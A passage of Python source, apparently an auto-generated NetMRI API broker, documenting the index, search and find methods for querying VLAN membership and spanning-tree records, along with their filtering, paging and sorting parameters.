:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
    """Lists the available vlan members matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.

    **Inputs**

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
    :type BaseBridgeAddress: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
    :type BaseBridgeAddress: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
    :type BaseNumPorts: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
    :type BaseNumPorts: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
    :type BridgeMemberInd: Boolean

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
    :type BridgeMemberInd: Array of Boolean

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
    :type DataSourceID: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
    :type DataSourceID: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
    :type DeviceID: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
    :type DeviceID: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
    :type InterfaceID: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
    :type InterfaceID: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
    :type RootBridgeAddress: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
    :type RootBridgeAddress: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeForwardDelay: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeForwardDelay: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeHelloTime: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeHelloTime: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeMaxAge: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
    :type StpBridgeMaxAge: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
    :type StpDesignatedRoot: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
    :type StpDesignatedRoot: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
    :type StpForwardDelay: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
    :type StpForwardDelay: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
    :type StpHelloTime: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
    :type StpHelloTime: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
    :type StpHoldTime: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
    :type StpHoldTime: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
    :type StpMaxAge: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
    :type StpMaxAge: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
    :type StpPriority: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
    :type StpPriority: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
    :type StpProtocolSpecification: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
    :type StpProtocolSpecification: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
    :type StpRootCost: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
    :type StpRootCost: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
    :type StpRootPort: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
    :type StpRootPort: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
    :type StpTopChanges: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
    :type StpTopChanges: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VTPDomain: Management domain name if VLAN is VTP managed.
    :type VTPDomain: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VTPDomain: Management domain name if VLAN is VTP managed.
    :type VTPDomain: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
    :type VlanID: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
    :type VlanID: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
    :type VlanMemberChangedCols: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
    :type VlanMemberChangedCols: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
    :type VlanMemberEndTime: DateTime

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
    :type VlanMemberEndTime: Array of DateTime

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
    :type VlanMemberID: Integer

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
    :type VlanMemberID: Array of Integer

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberStartTime: The starting effective time of this revision of the record.
    :type VlanMemberStartTime: DateTime

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberStartTime: The starting effective time of this revision of the record.
    :type VlanMemberStartTime: Array of DateTime

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberTimestamp: The date and time this record was collected or calculated.
    :type VlanMemberTimestamp: DateTime

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanMemberTimestamp: The date and time this record was collected or calculated.
    :type VlanMemberTimestamp: Array of DateTime

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
    :type VlanName: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
    :type VlanName: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
    The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
    The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
    :type VlanState: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
    The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
    The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
    :type VlanState: Array of String

    | ``api version min:`` 2.3
    | ``api version max:`` 2.4
    | ``required:`` False
    | ``default:`` None

    :param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
    :type VlanType: String

    | ``api version min:`` 2.5
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
    :type VlanType: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
    :type DeviceGroupID: Array of Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
    :type timestamp: DateTime

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
    :type methods: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
    :type include: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 0

    :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
    :type start: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` 1000

    :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
    :type limit: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` VlanMemberID

    :param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
    :type sort: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` asc

    :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
    :type dir: Array of String

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
    :type select: Array

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
    :type goto_field: String

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
    :type goto_value: String

    | ``api version min:`` 2.8
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param NetworkID: The network id to which results would be limited.
    :type NetworkID: Integer

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param query: This value will be matched against vlan members, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
    :type query: String

    | ``api version min:`` 2.3
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
    :type xml_filter: String

    **Outputs**

    | ``api version min:`` None
    | ``api version max:`` None
    | ``required:`` False
    | ``default:`` None

    :return vlan_members: An array of the VlanMember objects that match the specified input criteria.
    :rtype vlan_members: Array of VlanMember
    """
    # Resolve this broker's fully-qualified remote method name first, then
    # delegate the filtered listing to the shared list-request machinery.
    # All keyword arguments are forwarded untouched as the request payload.
    remote_method = self._get_method_fullname("search")
    return self.api_list_request(remote_method, kwargs)
def find(self, **kwargs):
"""Lists the available vlan members matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseBridgeAddress: The operator to apply to the field BaseBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseBridgeAddress: If op_BaseBridgeAddress is specified, the field named in this input will be compared to the value in BaseBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_f_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseBridgeAddress: If op_BaseBridgeAddress is specified, this value will be compared to the value in BaseBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_c_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseNumPorts: The operator to apply to the field BaseNumPorts. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseNumPorts: If op_BaseNumPorts is specified, the field named in this input will be compared to the value in BaseNumPorts using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_f_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseNumPorts: If op_BaseNumPorts is specified, this value will be compared to the value in BaseNumPorts using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_c_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BridgeMemberInd: The operator to apply to the field BridgeMemberInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BridgeMemberInd: If op_BridgeMemberInd is specified, the field named in this input will be compared to the value in BridgeMemberInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_f_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BridgeMemberInd: If op_BridgeMemberInd is specified, this value will be compared to the value in BridgeMemberInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_c_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
